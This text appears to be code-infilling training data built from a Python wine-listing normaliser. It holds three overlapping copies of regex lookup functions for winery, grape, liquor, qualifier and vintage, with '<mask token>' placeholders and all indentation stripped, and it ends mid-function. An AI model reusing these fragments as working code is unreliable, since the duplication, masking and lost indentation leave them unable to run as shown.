'WARNING:liquorLookup regexs will never execute - they are in ignoreGrapeLookup:'
, liquor)
for winery in ignoreGrapeLookup:
if winery in noGrapeLookup:
print(
'WARNING:ignoreGrapeLookup regexs will never execute - they are in noGrapeLookup:'
, winery)
def setOptionDictMasterFldValues(optiondict, debug=False):
for fld in ('fldWine', 'fldWineDescr'):
if not optiondict[fld + 'Master']:
optiondict[fld + 'Master'] = optiondict[fld]
<mask token>
def findWinery(rec, lastWinery, lastReWinery, fldWine, debug=False):
if lastWinery:
if debug:
try:
print('fw:new winery:', rec[fldWine])
except Exception as e:
print('debug error8-continuing:', str(e))
print('rec[fldWine]:type:', type(rec[fldWine]))
print('fw:checking if this is lastWinery:', lastWinery)
if lastReWinery.search(rec[fldWine]):
if debug:
print('fw:this matches the last winery')
return lastWinery, lastReWinery
elif debug:
print('fw:not last winery')
for winery, reWinery in wineryLookup:
if debug:
print('fw:not lastWinery-checking winery:', winery)
if fldWine not in rec:
print('not a column in this record fldWine:', fldWine)
print('rec:', rec)
if reWinery.search(rec[fldWine]):
if debug:
print('fw:winery match found:', winery)
return winery, reWinery
return None, None
<mask token>
def findStrInRecReturnOther(rec, fldWineDescr, findStr, debug=False):
matchLoc = rec[fldWineDescr].find(findStr)
if matchLoc > -1:
other = rec[fldWineDescr][matchLoc + len(findStr) + 1:].split()
if debug:
print('fsirro:findStr matched:', findStr)
if debug:
print('fsirro:findStr other:', other)
return findStr, other
if debug:
print('fsirro:findStr did not match using:', findStr)
return None, []
<mask token>
def findVintage(rec, fldWine, debug=False):
for reVintage in vintageLookup:
m = reVintage.search(rec[fldWine])
if m:
if m.group(1):
vintage = m.group(1)
if debug:
print('fv:vintage-match:', reVintage, ':group1')
elif m.group(2):
vintage = m.group(2)
if debug:
print('fv:vintage-match:', reVintage, ':group2')
elif m.group(3):
vintage = m.group(3)
if debug:
print('fv:vintage-match:', reVintage, ':group3')
else:
vintage = m.group(4)
if debug:
print('fv:vintage-match:', reVintage, ':group4')
return vintage
return None
def buildWineryGrapeLookup(wines, fldWineDescr='winedescr', fldWine='wine',
debug=False):
wgLookup = {}
lastWinery = None
lastReWinery = None
for rec in wines:
if debug:
print('bwgl:new rec:', rec[fldWineDescr])
if not fldWineDescr in rec:
print('creating-field:', fldWineDescr)
rec[fldWineDescr] = ''
winery = grape = wine = liquor = None
other = []
lastWinery, lastReWinery = winery, reWinery = findWinery(rec,
lastWinery, lastReWinery, fldWine, debug=debug)
if not winery:
if debug:
print('bwgl:did not find winery-skipping:', rec[fldWine])
continue
if winery in ignoreGrapeLookup:
wine = ''
if debug:
print('bwgl:wine check ignoreGrapeLookup on winery:', winery)
elif winery in noGrapeLookup:
if debug:
print('bwgl:wine check noGrapeLookup on winery:', winery)
wine = wineLookupByName(noGrapeLookup[winery], rec[fldWineDescr
], [], 'noGrapeLookup', debug=debug)
if False and wine == '':
if debug:
print('bwgl:nograpelookup:no-match:set wine to None')
wine = None
elif winery in liquorLookup:
if debug:
print('bwgl:liquor check on winery:', winery)
liquor, reLiquor = findLiquor(rec, winery, fldWine, debug=debug)
if liquor is not None:
wine = liquor
if debug:
print('bwgl:liquor found and put in wine:', wine)
if wine is None:
if debug:
print('bwgl:grape check because wine is None')
grape, other = findGrapeByStr(rec, fldWineDescr)
if debug:
print('bwgl:grape:', grape, ':other:', other)
elif debug:
print('bwgl:grape check skipped - we have a wine')
if wine is None and grape is None:
if debug:
print('bwgl:record skipped - no grape or wine defined')
continue
if grape is None:
if debug:
print('bwgl:build other from winery')
wineryFind, other = findStrInRecReturnOther(rec, fldWineDescr,
winery, debug=debug)
if 'case' in other:
other.remove('case')
if debug:
print('bwgl:remove case from other')
if other:
if debug:
print('bwgl:looking at other for quals, bottlesize and vintage'
)
if not other[-1].isdigit():
for qual, reQual in reQualLookup:
if qual == other[-1]:
if debug:
print('bwgl:remove qualifier from other:', qual)
del other[-1]
break
if other and not other[-1].isdigit():
for size, reSize in sizeLookup:
if size == other[-1]:
if debug:
print('bwgl:remove bottlesize from other:', size)
del other[-1]
break
if other and other[-1].isdigit():
if winery in ignoreGrapeLookup and ignoreGrapeLookup[winery
] and other[-1] in ignoreGrapeLookup[winery]:
if debug:
print(
'bwgl:value is in ignoreLookupGrape - keeping it:',
other[-1])
else:
if debug:
print('bwgl:remove vintage from other:', other[-1])
del other[-1]
if wine and wine in other:
other.remove(wine)
if debug:
print('bwgl:remove wine from other:', wine)
if debug:
try:
print('bwgl:Final-Build:', winery, ':', grape, ':', wine,
':', liquor, ':', other, ':', rec[fldWineDescr], ':',
rec[fldWine])
except Exception as e:
print('debug error2-continuing:', str(e))
print('fldWine:', fldWine)
if grape is None and wine is not None:
grape = wine
if debug:
print('bwgl:set-grape-to-wine:', grape)
if debug:
print('bwgl:create wgLookup for winery:', winery, ':grape:', grape)
if winery not in wgLookup:
wgLookup[winery] = {grape: []}
elif grape not in wgLookup[winery]:
wgLookup[winery][grape] = []
if other and other not in wgLookup[winery][grape]:
wgLookup[winery][grape].append(other)
if debug:
print('bwgl:appending to wgLookup:other:', other)
if debug:
print('bwgl:complete-read-of-master-file:sort wgLookup')
for winery in wgLookup:
for grape in wgLookup[winery]:
wgLookup[winery][grape] = sorted(wgLookup[winery][grape], key=
len, reverse=True)
if debug:
print('\n' * 5)
print('START WGLOOKUP DUMPED')
print('#' * 80)
if ppFlag:
pp.pprint(wgLookup)
else:
print('bwgl:final-wgLookup:\n', wgLookup)
print('#' * 80)
return wgLookup
def findAddAttribWgLookup(rec, winery, value, fldWine, AbbrLookup=[],
defaultorderlist=None, valueDescr='', debug=False):
singlematch = []
if debug:
try:
print('faawl:value:', valueDescr, ':match-wgLookup:', rec[
fldWine], ':', wgLookup[winery][value])
except Exception as e:
print('debug error7-continuing:', str(e))
print('fldWine:', fldWine)
for valuematchset in wgLookup[winery][value]:
if debug:
print('faawl:testing valuematchset:', valuematchset, ':length:',
len(valuematchset))
allmatch = True
for valuematch in valuematchset:
reMatch1 = re.compile('\\b' + valuematch + '\\b', re.IGNORECASE)
reMatch2 = re.compile('\\s' + valuematch + '\\s', re.IGNORECASE)
m1 = reMatch1.search(rec[fldWine])
m2 = reMatch2.search(rec[fldWine])
if m1 or m2:
allmatch = True and allmatch
elif valuematch in AbbrLookup:
if debug:
print('faawl:valuematch-abbr:', valuematch, ':',
wineAbbrLookup[valuematch])
reMatch = re.compile(wineAbbrLookup[valuematch], re.IGNORECASE)
allmatch = reMatch.search(rec[fldWine]) and allmatch
else:
allmatch = False and allmatch
if debug:
print('faawl:valuematch:', valuematch, ':allmatch:', allmatch)
if allmatch:
if debug:
print('faawl:value matched:', valuematchset)
if len(valuematchset) == 1:
if debug:
print('faawl:single-valuematch-set-added-to-singlematch:',
valuematchset)
singlematch.append(valuematchset)
else:
if debug:
print('faawl:multivalue-valuematch-set-found:done')
return valuematchset
if not singlematch:
if debug:
print('faawl:exit with singlematch NOT populated return blank')
return []
if debug:
print('faawl:exit with singlematch populated:', singlematch)
if len(singlematch) == 1 or not defaultorderlist:
if debug:
print('faawl:return first entry in singlematch:', singlematch[0])
return singlematch[0]
defaultorder = defaultorderlist[:]
if debug:
print('faawl:multiple single match value-singlematch:', singlematch)
for val in singlematch[::-1]:
if val not in defaultorder:
defaultorder.insert(0, val)
if winery == 'Mondavi' and ['Tok'] in singlematch:
if debug:
print('faawl:Change from:', valuematchset, ':to Tok for mondavi')
return ['Tok']
for val in defaultorder:
if val in singlematch:
if debug:
print('faawl:selected-singlematch-value:', val)
return val
if debug:
print('faawl:valuematchset-empty')
return []
<mask token>
| <mask token>
def globalVariableCheck(debug=False):
for liquor in liquorLookup:
if liquor in noGrapeLookup:
print(
'WARNING:liquorLookup regexs will never execute - they are in noGrapeLookup:'
, liquor)
if liquor in ignoreGrapeLookup:
print(
'WARNING:liquorLookup regexs will never execute - they are in ignoreGrapeLookup:'
, liquor)
for winery in ignoreGrapeLookup:
if winery in noGrapeLookup:
print(
'WARNING:ignoreGrapeLookup regexs will never execute - they are in noGrapeLookup:'
, winery)
def setOptionDictMasterFldValues(optiondict, debug=False):
for fld in ('fldWine', 'fldWineDescr'):
if not optiondict[fld + 'Master']:
optiondict[fld + 'Master'] = optiondict[fld]
<mask token>
def findQualifier(wine, debug=False):
for val, reSearch in reQualLookup:
if reSearch.search(wine):
if debug:
print('findQualifier:matched-returning:', val)
return val
if debug:
print('findQualifier:no-match-returning:', None)
return None
def findWinery(rec, lastWinery, lastReWinery, fldWine, debug=False):
if lastWinery:
if debug:
try:
print('fw:new winery:', rec[fldWine])
except Exception as e:
print('debug error8-continuing:', str(e))
print('rec[fldWine]:type:', type(rec[fldWine]))
print('fw:checking if this is lastWinery:', lastWinery)
if lastReWinery.search(rec[fldWine]):
if debug:
print('fw:this matches the last winery')
return lastWinery, lastReWinery
elif debug:
print('fw:not last winery')
for winery, reWinery in wineryLookup:
if debug:
print('fw:not lastWinery-checking winery:', winery)
if fldWine not in rec:
print('not a column in this record fldWine:', fldWine)
print('rec:', rec)
if reWinery.search(rec[fldWine]):
if debug:
print('fw:winery match found:', winery)
return winery, reWinery
return None, None
def findLiquor(rec, winery, fldWine, debug=False):
for liquor, reLiquor in liquorLookup[winery]:
if debug:
print('fl:checking liquor:', liquor)
if reLiquor.search(rec[fldWine]):
if debug:
print('fl:liquor match found:', liquor)
return liquor, reLiquor
return None, None
def findGrapeByRegex(rec, fldWine, debug=False):
for grape, reGrape in grapeLookup:
if debug:
print('fgbr:grape:', grape)
if grape is not None and reGrape.search(rec[fldWine]):
if debug:
print('fgbr:grape match found:', grape)
return grape, reGrape
return None, None
def findStrInRecReturnOther(rec, fldWineDescr, findStr, debug=False):
matchLoc = rec[fldWineDescr].find(findStr)
if matchLoc > -1:
other = rec[fldWineDescr][matchLoc + len(findStr) + 1:].split()
if debug:
print('fsirro:findStr matched:', findStr)
if debug:
print('fsirro:findStr other:', other)
return findStr, other
if debug:
print('fsirro:findStr did not match using:', findStr)
return None, []
def findGrapeByStr(rec, fldWineDescr, debug=False):
for grape, reGrape in grapeLookup:
if debug:
print('fg:grape:', grape)
grape, other = findStrInRecReturnOther(rec, fldWineDescr, grape,
debug=debug)
if grape:
return grape, other
return None, []
def findVintage(rec, fldWine, debug=False):
for reVintage in vintageLookup:
m = reVintage.search(rec[fldWine])
if m:
if m.group(1):
vintage = m.group(1)
if debug:
print('fv:vintage-match:', reVintage, ':group1')
elif m.group(2):
vintage = m.group(2)
if debug:
print('fv:vintage-match:', reVintage, ':group2')
elif m.group(3):
vintage = m.group(3)
if debug:
print('fv:vintage-match:', reVintage, ':group3')
else:
vintage = m.group(4)
if debug:
print('fv:vintage-match:', reVintage, ':group4')
return vintage
return None
def buildWineryGrapeLookup(wines, fldWineDescr='winedescr', fldWine='wine',
debug=False):
wgLookup = {}
lastWinery = None
lastReWinery = None
for rec in wines:
if debug:
print('bwgl:new rec:', rec[fldWineDescr])
if not fldWineDescr in rec:
print('creating-field:', fldWineDescr)
rec[fldWineDescr] = ''
winery = grape = wine = liquor = None
other = []
lastWinery, lastReWinery = winery, reWinery = findWinery(rec,
lastWinery, lastReWinery, fldWine, debug=debug)
if not winery:
if debug:
print('bwgl:did not find winery-skipping:', rec[fldWine])
continue
if winery in ignoreGrapeLookup:
wine = ''
if debug:
print('bwgl:wine check ignoreGrapeLookup on winery:', winery)
elif winery in noGrapeLookup:
if debug:
print('bwgl:wine check noGrapeLookup on winery:', winery)
wine = wineLookupByName(noGrapeLookup[winery], rec[fldWineDescr
], [], 'noGrapeLookup', debug=debug)
if False and wine == '':
if debug:
print('bwgl:nograpelookup:no-match:set wine to None')
wine = None
elif winery in liquorLookup:
if debug:
print('bwgl:liquor check on winery:', winery)
liquor, reLiquor = findLiquor(rec, winery, fldWine, debug=debug)
if liquor is not None:
wine = liquor
if debug:
print('bwgl:liquor found and put in wine:', wine)
if wine is None:
if debug:
print('bwgl:grape check because wine is None')
grape, other = findGrapeByStr(rec, fldWineDescr)
if debug:
print('bwgl:grape:', grape, ':other:', other)
elif debug:
print('bwgl:grape check skipped - we have a wine')
if wine is None and grape is None:
if debug:
print('bwgl:record skipped - no grape or wine defined')
continue
if grape is None:
if debug:
print('bwgl:build other from winery')
wineryFind, other = findStrInRecReturnOther(rec, fldWineDescr,
winery, debug=debug)
if 'case' in other:
other.remove('case')
if debug:
print('bwgl:remove case from other')
if other:
if debug:
print('bwgl:looking at other for quals, bottlesize and vintage'
)
if not other[-1].isdigit():
for qual, reQual in reQualLookup:
if qual == other[-1]:
if debug:
print('bwgl:remove qualifier from other:', qual)
del other[-1]
break
if other and not other[-1].isdigit():
for size, reSize in sizeLookup:
if size == other[-1]:
if debug:
print('bwgl:remove bottlesize from other:', size)
del other[-1]
break
if other and other[-1].isdigit():
if winery in ignoreGrapeLookup and ignoreGrapeLookup[winery
] and other[-1] in ignoreGrapeLookup[winery]:
if debug:
print(
'bwgl:value is in ignoreLookupGrape - keeping it:',
other[-1])
else:
if debug:
print('bwgl:remove vintage from other:', other[-1])
del other[-1]
if wine and wine in other:
other.remove(wine)
if debug:
print('bwgl:remove wine from other:', wine)
if debug:
try:
print('bwgl:Final-Build:', winery, ':', grape, ':', wine,
':', liquor, ':', other, ':', rec[fldWineDescr], ':',
rec[fldWine])
except Exception as e:
print('debug error2-continuing:', str(e))
print('fldWine:', fldWine)
if grape is None and wine is not None:
grape = wine
if debug:
print('bwgl:set-grape-to-wine:', grape)
if debug:
print('bwgl:create wgLookup for winery:', winery, ':grape:', grape)
if winery not in wgLookup:
wgLookup[winery] = {grape: []}
elif grape not in wgLookup[winery]:
wgLookup[winery][grape] = []
if other and other not in wgLookup[winery][grape]:
wgLookup[winery][grape].append(other)
if debug:
print('bwgl:appending to wgLookup:other:', other)
if debug:
print('bwgl:complete-read-of-master-file:sort wgLookup')
for winery in wgLookup:
for grape in wgLookup[winery]:
wgLookup[winery][grape] = sorted(wgLookup[winery][grape], key=
len, reverse=True)
if debug:
print('\n' * 5)
print('START WGLOOKUP DUMPED')
print('#' * 80)
if ppFlag:
pp.pprint(wgLookup)
else:
print('bwgl:final-wgLookup:\n', wgLookup)
print('#' * 80)
return wgLookup
def findAddAttribWgLookup(rec, winery, value, fldWine, AbbrLookup=[],
defaultorderlist=None, valueDescr='', debug=False):
singlematch = []
if debug:
try:
print('faawl:value:', valueDescr, ':match-wgLookup:', rec[
fldWine], ':', wgLookup[winery][value])
except Exception as e:
print('debug error7-continuing:', str(e))
print('fldWine:', fldWine)
for valuematchset in wgLookup[winery][value]:
if debug:
print('faawl:testing valuematchset:', valuematchset, ':length:',
len(valuematchset))
allmatch = True
for valuematch in valuematchset:
reMatch1 = re.compile('\\b' + valuematch + '\\b', re.IGNORECASE)
reMatch2 = re.compile('\\s' + valuematch + '\\s', re.IGNORECASE)
m1 = reMatch1.search(rec[fldWine])
m2 = reMatch2.search(rec[fldWine])
if m1 or m2:
allmatch = True and allmatch
elif valuematch in AbbrLookup:
if debug:
print('faawl:valuematch-abbr:', valuematch, ':',
wineAbbrLookup[valuematch])
reMatch = re.compile(wineAbbrLookup[valuematch], re.IGNORECASE)
allmatch = reMatch.search(rec[fldWine]) and allmatch
else:
allmatch = False and allmatch
if debug:
print('faawl:valuematch:', valuematch, ':allmatch:', allmatch)
if allmatch:
if debug:
print('faawl:value matched:', valuematchset)
if len(valuematchset) == 1:
if debug:
print('faawl:single-valuematch-set-added-to-singlematch:',
valuematchset)
singlematch.append(valuematchset)
else:
if debug:
print('faawl:multivalue-valuematch-set-found:done')
return valuematchset
if not singlematch:
if debug:
print('faawl:exit with singlematch NOT populated return blank')
return []
if debug:
print('faawl:exit with singlematch populated:', singlematch)
if len(singlematch) == 1 or not defaultorderlist:
if debug:
print('faawl:return first entry in singlematch:', singlematch[0])
return singlematch[0]
defaultorder = defaultorderlist[:]
if debug:
print('faawl:multiple single match value-singlematch:', singlematch)
for val in singlematch[::-1]:
if val not in defaultorder:
defaultorder.insert(0, val)
if winery == 'Mondavi' and ['Tok'] in singlematch:
if debug:
print('faawl:Change from:', valuematchset, ':to Tok for mondavi')
return ['Tok']
for val in defaultorder:
if val in singlematch:
if debug:
print('faawl:selected-singlematch-value:', val)
return val
if debug:
print('faawl:valuematchset-empty')
return []
<mask token>
def setDigitFld2Value(wines, fld, value, debug=False):
for rec in wines:
if rec[fld].isdigit():
rec[fld] = value
def updateFileOptionDictCheck(optiondict, wines, header, debug=False):
if optiondict['fldWineDescr'] not in wines[0]:
if debug:
print('updateFileOptionDictCheck:fldWineDescr NOT in file read in:'
, optiondict['fldWineDescr'])
if 'cnt' in wines[0]:
print('setting values fldWineDescr and fldWineDescrNew to: cnt')
optiondict['fldWineDescr'] = optiondict['fldWineDescrNew'] = 'cnt'
elif 'winedescr' in wines[0]:
print(
'setting values fldWineDescr to winedescr and fldWineDescrNew to winedescrnew'
)
optiondict['fldWineDescr'] = 'winedescr'
optiondict['fldWineDescrNew'] = 'winedescrnew'
else:
print('could not find fldWineDescr in wines[0]-aborting:',
optiondict['fldWineDescr'], '\nwines[0]:', wines[0])
error = wines[0][optiondict['fldWineDescr']]
if False and optiondict['fldWineDescr'] == 'winedescr':
if not optiondict['fldWineDescrMatch']:
optiondict['fldWineDescrMatch'] = 'same'
print('setting value fldWineDescrMatch to: same')
if optiondict['csvfile_update_in'] == optiondict['csvfile_update_out']:
file_path, base_filename, file_ext = kvutil.filename_split(optiondict
['csvfile_update_in'])
backupfile = kvutil.filename_proper(base_filename + optiondict[
'backupfile_ext'], file_path)
print('copying ', optiondict['csvfile_update_in'], ' to ', backupfile)
shutil.copyfile(optiondict['csvfile_update_in'], backupfile)
if optiondict['fldWineDescrNew'] == 'cnt':
optiondict['csvdictkeys'] = ['cnt', 'date', 'search', 'store',
'wine', 'winesrt']
elif optiondict['fldWineDescrMatch']:
optiondict['csvdictkeys'] = [optiondict['fldWineDescr'], optiondict
['fldWineDescrNew'], optiondict['fldWineDescrMatch'], *header]
else:
optiondict['csvdictkeys'] = [optiondict['fldWineDescrNew']] + header[1:
]
print('updateFileOptionDictCheck:set csvdictkeys to:', optiondict[
'csvdictkeys'])
<mask token>
| <mask token>
def globalVariableCheck(debug=False):
for liquor in liquorLookup:
if liquor in noGrapeLookup:
print(
'WARNING:liquorLookup regexs will never execute - they are in noGrapeLookup:'
, liquor)
if liquor in ignoreGrapeLookup:
print(
'WARNING:liquorLookup regexs will never execute - they are in ignoreGrapeLookup:'
, liquor)
for winery in ignoreGrapeLookup:
if winery in noGrapeLookup:
print(
'WARNING:ignoreGrapeLookup regexs will never execute - they are in noGrapeLookup:'
, winery)
def setOptionDictMasterFldValues(optiondict, debug=False):
for fld in ('fldWine', 'fldWineDescr'):
if not optiondict[fld + 'Master']:
optiondict[fld + 'Master'] = optiondict[fld]
def wineLookupByName(nameLookup, lookupStr, other, msg, wineAbbrLookup=None,
debug=False):
funcname = 'wineLookupByName:' + msg + ':'
if debug:
print(funcname + 'nameLookup:', nameLookup)
if nameLookup is None:
if debug:
print(funcname + 'match: value is none - continue on')
return ''
for name in nameLookup:
if debug:
print(funcname + 'match-name:', name)
if name is None:
if debug:
print(funcname +
'name-matched: value is none - continue on:pass back blank'
)
return ''
reName = re.compile('\\b' + name + '\\b', re.IGNORECASE)
if reName.search(lookupStr):
if debug:
print(funcname + 'name-MATCHED:', name)
for val in other:
if reName.search(val):
other.remove(val)
if debug:
print(funcname + 'name-remove-from-other:', val)
return name
if wineAbbrLookup and name in wineAbbrLookup:
reName = re.compile(wineAbbrLookup[name], re.IGNORECASE)
if debug:
print(funcname + 'Abbr-match-name:', name)
if reName.search(lookupStr):
if debug:
print(funcname + 'Abbr-name-MATCHED:', wineAbbrLookup[name]
)
for val in other:
if reName.search(val):
other.remove(val)
if debug:
print(funcname + 'name-remove-from-other:', val)
return name
if debug:
print(funcname + 'name match not found:set to blank')
return None
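# wineLookupByName walks nameLookup in order: a None lookup (or a None entry)
# means "no named wine expected" and returns '' immediately; otherwise each
# name is tried as a whole-word match against lookupStr, with a wineAbbrLookup
# regex as fallback, matched tokens are removed from `other`, and the name is
# returned. Returns None when nothing matches.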
def findQualifier(wine, debug=False):
for val, reSearch in reQualLookup:
if reSearch.search(wine):
if debug:
print('findQualifier:matched-returning:', val)
return val
if debug:
print('findQualifier:no-match-returning:', None)
return None
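# findQualifier returns the first qualifier whose regex matches the wine
# string (hypothetical example: 'Silver Oak Cab Gift' yields 'Gift'); the
# leading (None, Without Gift|No Gift) entry deliberately wins first so
# negated gifts return no qualifier.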
def findWinery(rec, lastWinery, lastReWinery, fldWine, debug=False):
if lastWinery:
if debug:
try:
print('fw:new winery:', rec[fldWine])
except Exception as e:
print('debug error8-continuing:', str(e))
print('rec[fldWine]:type:', type(rec[fldWine]))
print('fw:checking if this is lastWinery:', lastWinery)
if lastReWinery.search(rec[fldWine]):
if debug:
print('fw:this matches the last winery')
return lastWinery, lastReWinery
elif debug:
print('fw:not last winery')
for winery, reWinery in wineryLookup:
if debug:
print('fw:not lastWinery-checking winery:', winery)
if fldWine not in rec:
print('not a column in this record fldWine:', fldWine)
print('rec:', rec)
if reWinery.search(rec[fldWine]):
if debug:
print('fw:winery match found:', winery)
return winery, reWinery
return None, None
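# findWinery retries lastWinery/lastReWinery as a cheap cache (presumably
# because input rows are often grouped by winery) before scanning the full
# wineryLookup table; returns (winery, compiled_regex) or (None, None).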
def findLiquor(rec, winery, fldWine, debug=False):
for liquor, reLiquor in liquorLookup[winery]:
if debug:
print('fl:checking liquor:', liquor)
if reLiquor.search(rec[fldWine]):
if debug:
print('fl:liquor match found:', liquor)
return liquor, reLiquor
return None, None
def findGrapeByRegex(rec, fldWine, debug=False):
for grape, reGrape in grapeLookup:
if debug:
print('fgbr:grape:', grape)
if grape is not None and reGrape.search(rec[fldWine]):
if debug:
print('fgbr:grape match found:', grape)
return grape, reGrape
return None, None
def findStrInRecReturnOther(rec, fldWineDescr, findStr, debug=False):
matchLoc = rec[fldWineDescr].find(findStr)
if matchLoc > -1:
other = rec[fldWineDescr][matchLoc + len(findStr) + 1:].split()
if debug:
print('fsirro:findStr matched:', findStr)
if debug:
print('fsirro:findStr other:', other)
return findStr, other
if debug:
print('fsirro:findStr did not match using:', findStr)
return None, []
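# Hypothetical example: findStrInRecReturnOther({'winedescr': 'Caymus Cab 2018'},
# 'winedescr', 'Caymus') returns ('Caymus', ['Cab', '2018']), i.e. the matched
# string plus the whitespace-split tokens that follow it.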
def findGrapeByStr(rec, fldWineDescr, debug=False):
for grape, reGrape in grapeLookup:
if debug:
print('fg:grape:', grape)
grape, other = findStrInRecReturnOther(rec, fldWineDescr, grape,
debug=debug)
if grape:
return grape, other
return None, []
def findVintage(rec, fldWine, debug=False):
for reVintage in vintageLookup:
m = reVintage.search(rec[fldWine])
if m:
if m.group(1):
vintage = m.group(1)
if debug:
print('fv:vintage-match:', reVintage, ':group1')
elif m.group(2):
vintage = m.group(2)
if debug:
print('fv:vintage-match:', reVintage, ':group2')
elif m.group(3):
vintage = m.group(3)
if debug:
print('fv:vintage-match:', reVintage, ':group3')
else:
vintage = m.group(4)
if debug:
print('fv:vintage-match:', reVintage, ':group4')
return vintage
return None
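# findVintage returns the year captured by the first matching vintageLookup
# pattern (the last pattern also accepts 2-digit abbreviations such as '18),
# or None when no pattern matches.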
def buildWineryGrapeLookup(wines, fldWineDescr='winedescr', fldWine='wine',
debug=False):
wgLookup = {}
lastWinery = None
lastReWinery = None
for rec in wines:
if debug:
print('bwgl:new rec:', rec[fldWineDescr])
if not fldWineDescr in rec:
print('creating-field:', fldWineDescr)
rec[fldWineDescr] = ''
winery = grape = wine = liquor = None
other = []
lastWinery, lastReWinery = winery, reWinery = findWinery(rec,
lastWinery, lastReWinery, fldWine, debug=debug)
if not winery:
if debug:
print('bwgl:did not find winery-skipping:', rec[fldWine])
continue
if winery in ignoreGrapeLookup:
wine = ''
if debug:
print('bwgl:wine check ignoreGrapeLookup on winery:', winery)
elif winery in noGrapeLookup:
if debug:
print('bwgl:wine check noGrapeLookup on winery:', winery)
wine = wineLookupByName(noGrapeLookup[winery], rec[fldWineDescr
], [], 'noGrapeLookup', debug=debug)
if False and wine == '':
if debug:
print('bwgl:nograpelookup:no-match:set wine to None')
wine = None
elif winery in liquorLookup:
if debug:
print('bwgl:liquor check on winery:', winery)
liquor, reLiquor = findLiquor(rec, winery, fldWine, debug=debug)
if liquor is not None:
wine = liquor
if debug:
print('bwgl:liquor found and put in wine:', wine)
if wine is None:
if debug:
print('bwgl:grape check because wine is None')
grape, other = findGrapeByStr(rec, fldWineDescr)
if debug:
print('bwgl:grape:', grape, ':other:', other)
elif debug:
print('bwgl:grape check skipped - we have a wine')
if wine is None and grape is None:
if debug:
print('bwgl:record skipped - no grape or wine defined')
continue
if grape is None:
if debug:
print('bwgl:build other from winery')
wineryFind, other = findStrInRecReturnOther(rec, fldWineDescr,
winery, debug=debug)
if 'case' in other:
other.remove('case')
if debug:
print('bwgl:remove case from other')
if other:
if debug:
print('bwgl:looking at other for quals, bottlesize and vintage'
)
if not other[-1].isdigit():
for qual, reQual in reQualLookup:
if qual == other[-1]:
if debug:
print('bwgl:remove qualifier from other:', qual)
del other[-1]
break
if other and not other[-1].isdigit():
for size, reSize in sizeLookup:
if size == other[-1]:
if debug:
print('bwgl:remove bottlesize from other:', size)
del other[-1]
break
if other and other[-1].isdigit():
if winery in ignoreGrapeLookup and ignoreGrapeLookup[winery
] and other[-1] in ignoreGrapeLookup[winery]:
if debug:
print(
'bwgl:value is in ignoreLookupGrape - keeping it:',
other[-1])
else:
if debug:
print('bwgl:remove vintage from other:', other[-1])
del other[-1]
if wine and wine in other:
other.remove(wine)
if debug:
print('bwgl:remove wine from other:', wine)
if debug:
try:
print('bwgl:Final-Build:', winery, ':', grape, ':', wine,
':', liquor, ':', other, ':', rec[fldWineDescr], ':',
rec[fldWine])
except Exception as e:
print('debug error2-continuing:', str(e))
print('fldWine:', fldWine)
if grape is None and wine is not None:
grape = wine
if debug:
print('bwgl:set-grape-to-wine:', grape)
if debug:
print('bwgl:create wgLookup for winery:', winery, ':grape:', grape)
if winery not in wgLookup:
wgLookup[winery] = {grape: []}
elif grape not in wgLookup[winery]:
wgLookup[winery][grape] = []
if other and other not in wgLookup[winery][grape]:
wgLookup[winery][grape].append(other)
if debug:
print('bwgl:appending to wgLookup:other:', other)
if debug:
print('bwgl:complete-read-of-master-file:sort wgLookup')
for winery in wgLookup:
for grape in wgLookup[winery]:
wgLookup[winery][grape] = sorted(wgLookup[winery][grape], key=
len, reverse=True)
if debug:
print('\n' * 5)
print('START WGLOOKUP DUMPED')
print('#' * 80)
if ppFlag:
pp.pprint(wgLookup)
else:
print('bwgl:final-wgLookup:\n', wgLookup)
print('#' * 80)
return wgLookup
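# buildWineryGrapeLookup returns a nested dict of the form
#   {winery: {grape_or_wine: [[leftover, tokens], ...]}}
# built from the master file; each token list is what remained of winedescr
# after stripping winery, grape, qualifier, bottle size and vintage, sorted
# longest-first so the most specific sets are tried first when matching.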
def findAddAttribWgLookup(rec, winery, value, fldWine, AbbrLookup=[],
defaultorderlist=None, valueDescr='', debug=False):
singlematch = []
if debug:
try:
print('faawl:value:', valueDescr, ':match-wgLookup:', rec[
fldWine], ':', wgLookup[winery][value])
except Exception as e:
print('debug error7-continuing:', str(e))
print('fldWine:', fldWine)
for valuematchset in wgLookup[winery][value]:
if debug:
print('faawl:testing valuematchset:', valuematchset, ':length:',
len(valuematchset))
allmatch = True
for valuematch in valuematchset:
reMatch1 = re.compile('\\b' + valuematch + '\\b', re.IGNORECASE)
reMatch2 = re.compile('\\s' + valuematch + '\\s', re.IGNORECASE)
m1 = reMatch1.search(rec[fldWine])
m2 = reMatch2.search(rec[fldWine])
if m1 or m2:
allmatch = True and allmatch
elif valuematch in AbbrLookup:
if debug:
print('faawl:valuematch-abbr:', valuematch, ':',
wineAbbrLookup[valuematch])
reMatch = re.compile(wineAbbrLookup[valuematch], re.IGNORECASE)
allmatch = reMatch.search(rec[fldWine]) and allmatch
else:
allmatch = False and allmatch
if debug:
print('faawl:valuematch:', valuematch, ':allmatch:', allmatch)
if allmatch:
if debug:
print('faawl:value matched:', valuematchset)
if len(valuematchset) == 1:
if debug:
print('faawl:single-valuematch-set-added-to-singlematch:',
valuematchset)
singlematch.append(valuematchset)
else:
if debug:
print('faawl:multivalue-valuematch-set-found:done')
return valuematchset
if not singlematch:
if debug:
print('faawl:exit with singlematch NOT populated return blank')
return []
if debug:
print('faawl:exit with singlematch populated:', singlematch)
if len(singlematch) == 1 or not defaultorderlist:
if debug:
print('faawl:return first entry in singlematch:', singlematch[0])
return singlematch[0]
defaultorder = defaultorderlist[:]
if debug:
print('faawl:multiple single match value-singlematch:', singlematch)
for val in singlematch[::-1]:
if val not in defaultorder:
defaultorder.insert(0, val)
if winery == 'Mondavi' and ['Tok'] in singlematch:
if debug:
print('faawl:Change from:', valuematchset, ':to Tok for mondavi')
return ['Tok']
for val in defaultorder:
if val in singlematch:
if debug:
print('faawl:selected-singlematch-value:', val)
return val
if debug:
print('faawl:valuematchset-empty')
return []
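# findAddAttribWgLookup returns the first multi-token set from
# wgLookup[winery][value] whose every token matches fldWine (directly or via
# wineAbbrLookup); single-token matches are collected and disambiguated with
# defaultorderlist, with a hard-coded preference for ['Tok'] on Mondavi rows.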
def setWineryDescrFromWineryGrapeLookup(wgLookup, wines, fldWineDescr=
'winedescr', fldWine='wine', fldWineDescrNew='winedescrnew',
fldWineDescrMatch=False, debug=False):
if debug:
print('\n' * 10,
'START WINEDESCR SETTING HERE ---------------------------------------------'
)
for rec in wines:
        winery = grape = wine = vintage = case = size = liquor = nongrape = qual = None
winematchset = grapematchset = []
if debug:
try:
